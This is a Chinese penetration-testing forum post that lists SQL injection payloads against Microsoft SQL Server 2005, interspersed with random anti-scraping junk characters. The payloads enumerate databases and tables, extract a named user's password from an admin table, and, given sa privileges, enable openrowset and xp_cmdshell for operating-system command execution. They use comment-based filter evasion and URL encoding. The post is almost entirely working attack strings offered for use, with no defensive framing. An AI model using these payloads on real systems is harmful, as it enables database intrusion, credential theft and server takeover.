找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 MSsql2005注入语句
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2169|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
; x9 @' I  r, }
/ T. h8 M8 p' \7 Q9 @
7 Y/ e7 N9 o: R
[Copy to clipboard]CODE:
$ s8 P! `; v3 ~! Y6 ^, n8 c; M/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--$ O. n7 L" O4 D3 F1 C
+ P& K1 [! r4 I- m: F7 J" y/ i
爆表语句,somedb部份是所要列的数据库,红色数字1累加
2 Z! i: g+ t$ x! w$ m1 ]2 U2 C
9 W4 `! i- k& Q; `. |( e
4 m) F" Z1 x4 H[Copy to clipboard]CODE:
2 K2 Q  w* `, J# W1 [/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--0 S( B" k" H; e* U2 N7 }7 B
9 o) x9 k, E5 g$ q
爆字段语句,爆表admin里user='icerover'的密码段" I8 b: p5 x) k3 @9 g: q. }, w

; k6 H7 e8 k# }% T- r# }2 `; N0 v7 o7 i8 ^5 X, f" K3 p& b+ O4 C
[Copy to clipboard]CODE:4 ?2 R! m! P1 E* o- ?8 k
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--; {6 ]8 B: l6 H; w3 R6 i! y, {6 `2 O7 ^
- s' Q0 l+ H  ?* ~
mssql2005默认没有开xp_cmdshell的,openrowset也不能用
2 C3 g* ]/ x& M$ X/ H如果是sa权限,可以这样来开启, N; ]  l. A8 c, s0 S
开启openrowset) x8 U3 ^" J" p& x" j( r

9 u* Q1 H( E4 r. Z: y5 v
6 Q) _' [4 H$ }* x6 q1 Q7 Z[Copy to clipboard]CODE:
7 F7 \7 Q5 o/ L% F8 }/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
  R! O5 r( D$ _, Y' X: ?. E1 \0 y/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--1 Y$ q& q3 U$ E( M+ @; i
# x" o6 G3 \/ t2 Q. _$ Q% X! ~7 k
开启xp_cmdshell
4 l- b1 @) n4 ]3 g! K9 I/ @3 U: u1 S
4 f- Y) q7 Q1 s& M2 ?1 @: V, y, Y
[Copy to clipboard]CODE:$ z$ m/ d% k6 V5 n$ r. {
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--" q- H, b2 J6 t% v: h
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--7 P1 J0 P4 g  }

% W6 u, x- s0 z9 }ok,over~~晚安$ T( t, ^9 Q5 @
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表